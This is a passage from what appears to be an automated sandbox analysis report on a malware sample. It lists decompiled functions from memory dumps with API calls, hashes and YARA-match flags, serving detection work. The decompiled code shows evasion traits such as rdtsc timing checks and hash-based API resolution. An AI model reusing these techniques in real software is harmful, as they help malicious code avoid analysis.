                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00409A80(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t52;
				intOrPtr _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t58;

				_t54 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(__ecx, __edx, _t54,  &_v24); // executed
				_t56 = _t55 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t57 = _t56 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t58 = _t57 + 0x10;
						_t52 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t54, _t52),  &_v284);
							_t58 = _t58 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t52 = _t52 + 1;
							if(_t52 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t54 + 0x14; // 0xffffe055
						 *(_t54 + 0x474) =  *(_t54 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t57 = _t58 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t54,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t54 + 0x55c)) =  *((intOrPtr*)(_t54 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t54 + 0x31)) =  *((intOrPtr*)(_t54 + 0x31)) + _t39;
					_t20 = _t54 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t54 + 0x32)) =  *((intOrPtr*)(_t54 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                      0x00409a8b
                                                                                                                                                      0x00409a93
                                                                                                                                                      0x00409a95
                                                                                                                                                      0x00409a9a
                                                                                                                                                      0x00409a9f
                                                                                                                                                      0x00409ab2
                                                                                                                                                      0x00409ab7
                                                                                                                                                      0x00409ac0
                                                                                                                                                      0x00409acc
                                                                                                                                                      0x00409adf
                                                                                                                                                      0x00409ae4
                                                                                                                                                      0x00409ae7
                                                                                                                                                      0x00409af0
                                                                                                                                                      0x00409b02
                                                                                                                                                      0x00409b07
                                                                                                                                                      0x00409b0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409b0e
                                                                                                                                                      0x00409b12
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409b14
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409b12
                                                                                                                                                      0x00409b16
                                                                                                                                                      0x00409b19
                                                                                                                                                      0x00409b1f
                                                                                                                                                      0x00409b21
                                                                                                                                                      0x00409b2c
                                                                                                                                                      0x00409b31
                                                                                                                                                      0x00409b34
                                                                                                                                                      0x00409b41
                                                                                                                                                      0x00409b4c
                                                                                                                                                      0x00409b4e
                                                                                                                                                      0x00409b54
                                                                                                                                                      0x00409b58
                                                                                                                                                      0x00409b5b
                                                                                                                                                      0x00409b5b
                                                                                                                                                      0x00409b62
                                                                                                                                                      0x00409b65
                                                                                                                                                      0x00409b6a
                                                                                                                                                      0x00409b77
                                                                                                                                                      0x00409aa6
                                                                                                                                                      0x00409aa6
                                                                                                                                                      0x00409aa6

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                      • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                                                                                                                      • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                      • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                                                                                                                                      0x0041a037
                                                                                                                                                      0x0041a03c
                                                                                                                                                      0x0041a04d
                                                                                                                                                      0x0041a051

                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: oLA
                                                                                                                                                      • API String ID: 1279760036-3789366272
                                                                                                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                      • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                                                                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                      • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 43%
                                                                                                                                                      			E004082F0(void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v3;
				char _v67;
				char _v68;
				void* _t15;
				intOrPtr* _t16;
				int _t17;
				long _t24;
				intOrPtr* _t28;
				void* _t33;

				_t33 = __eflags;
				_push(0x3f);
				_push(0);
				 *((intOrPtr*)( &_v67 - 0x3a)) =  *((intOrPtr*)( &_v67 - 0x3a)) + __edx;
				asm("rol byte [eax], 0xe8");
				 *(__edx + 3) =  *(__edx + 3) >> 0x51;
				E0041C3F0();
				_t15 = E0040ACC0(_t33, _a4 + 0x1c,  &_v68); // executed
				_t16 = E00414E10(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
				_t28 = _t16;
				if(_t28 != 0) {
					_t24 = _a8;
					_t17 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t35 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t28(_t24, 0x8003,  &_v3 + (E0040A450(_t35, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
					return _t17;
				}
				return _t16;
			}












                                                                                                                                                      0x004082f0
                                                                                                                                                      0x004082f7
                                                                                                                                                      0x004082fc
                                                                                                                                                      0x004082fd
                                                                                                                                                      0x00408301
                                                                                                                                                      0x0040830a
                                                                                                                                                      0x0040830e
                                                                                                                                                      0x0040831e
                                                                                                                                                      0x0040832e
                                                                                                                                                      0x00408333
                                                                                                                                                      0x0040833a
                                                                                                                                                      0x0040833d
                                                                                                                                                      0x0040834a
                                                                                                                                                      0x0040834c
                                                                                                                                                      0x0040834e
                                                                                                                                                      0x0040836b
                                                                                                                                                      0x0040836b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040836d
                                                                                                                                                      0x00408372

                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                                                                                                                      • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                                                                                                                      • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                                                                                                                      • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004082B4, Relevance: 1.6, APIs: 1, Instructions: 53threadwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                                      			E004082B4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t20;
				int _t21;
				long _t33;
				int _t38;
				intOrPtr* _t40;
				void* _t42;
				void* _t43;

				asm("lahf");
				if(__eflags > 0) {
					 *((intOrPtr*)(__eax - 0x3a)) =  *((intOrPtr*)(__eax - 0x3a)) + __edx;
					_t43 = _t42 + 1;
					asm("rol byte [eax], 0xe8");
					 *(__edx + 3) =  *(__edx + 3) >> 0x51;
					E0041C3F0();
					_t20 = E0040ACC0(__eflags,  *((intOrPtr*)(_t43 + 8)) + 0x1c, _t43 - 0x40); // executed
					_t21 = E00414E10( *((intOrPtr*)(_t43 + 8)) + 0x1c, _t20, 0, 0, 0xc4e7b6d6);
					_t38 = _t21;
					__eflags = _t38;
					if(_t38 != 0) {
						_t33 =  *(_t43 + 0xc);
						_t21 = PostThreadMessageW(_t33, 0x111, 0, 0); // executed
						__eflags = _t21;
						if(__eflags == 0) {
							_t21 =  *_t38(_t33, 0x8003, _t43 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t21);
						}
					}
					return _t21;
				} else {
					_push(0x11c6f95e);
					asm("adc eax, ebp");
					asm("lds ebp, [edi]");
					 *__eax =  *__eax + __eax;
					_t40 = __eax;
					return E0041B140(__ecx) + _t40 + 0x1000;
				}
			}










                                                                                                                                                      0x004082b4
                                                                                                                                                      0x004082b5
                                                                                                                                                      0x004082fd
                                                                                                                                                      0x00408300
                                                                                                                                                      0x00408301
                                                                                                                                                      0x0040830a
                                                                                                                                                      0x0040830e
                                                                                                                                                      0x0040831e
                                                                                                                                                      0x0040832e
                                                                                                                                                      0x00408333
                                                                                                                                                      0x00408338
                                                                                                                                                      0x0040833a
                                                                                                                                                      0x0040833d
                                                                                                                                                      0x0040834a
                                                                                                                                                      0x0040834c
                                                                                                                                                      0x0040834e
                                                                                                                                                      0x0040836b
                                                                                                                                                      0x0040836b
                                                                                                                                                      0x0040836d
                                                                                                                                                      0x00408372
                                                                                                                                                      0x004082b7
                                                                                                                                                      0x004082c1
                                                                                                                                                      0x004082c5
                                                                                                                                                      0x004082c7
                                                                                                                                                      0x004082c9
                                                                                                                                                      0x004082ce
                                                                                                                                                      0x004082dd
                                                                                                                                                      0x004082dd

                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: 2b3adb0071994df51cd41f5f42042d8539a45084a110832d02e8ac1b0969323b
                                                                                                                                                      • Instruction ID: d48ca81efc16e9748d7ccb43bdd4a35d2d56e06922ad4484a4080720d69b134b
                                                                                                                                                      • Opcode Fuzzy Hash: 2b3adb0071994df51cd41f5f42042d8539a45084a110832d02e8ac1b0969323b
                                                                                                                                                      • Instruction Fuzzy Hash: 72014C317407543AE71166685D43FFF7B14AF81B14F0982AEFE44BE1C3C6E9180642E9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041A052, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                      			E0041A052(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t18;

				asm("rcl ecx, cl");
				asm("rep insb");
				asm("rol ebx, cl");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E0041A950(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                                                                                                                                                      0x0041a057
                                                                                                                                                      0x0041a059
                                                                                                                                                      0x0041a05d
                                                                                                                                                      0x0041a063
                                                                                                                                                      0x0041a06f
                                                                                                                                                      0x0041a077
                                                                                                                                                      0x0041a08d
                                                                                                                                                      0x0041a091

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                      • Opcode ID: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                      • Instruction ID: 2c97211f60695eaf0afd548d493c0fa8256eb5ca2da6a4da6b64e692b9e06fa3
                                                                                                                                                      • Opcode Fuzzy Hash: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                      • Instruction Fuzzy Hash: 2FE068B80003454FDB04EE38C4D24673B84EF802207008A8FEC5943202C124C81987A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                      0x0041a06f
                                                                                                                                                      0x0041a077
                                                                                                                                                      0x0041a08d
                                                                                                                                                      0x0041a091

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                      • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                                                                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                      • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                      0x0041a1da
                                                                                                                                                      0x0041a1f0
                                                                                                                                                      0x0041a1f4

                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
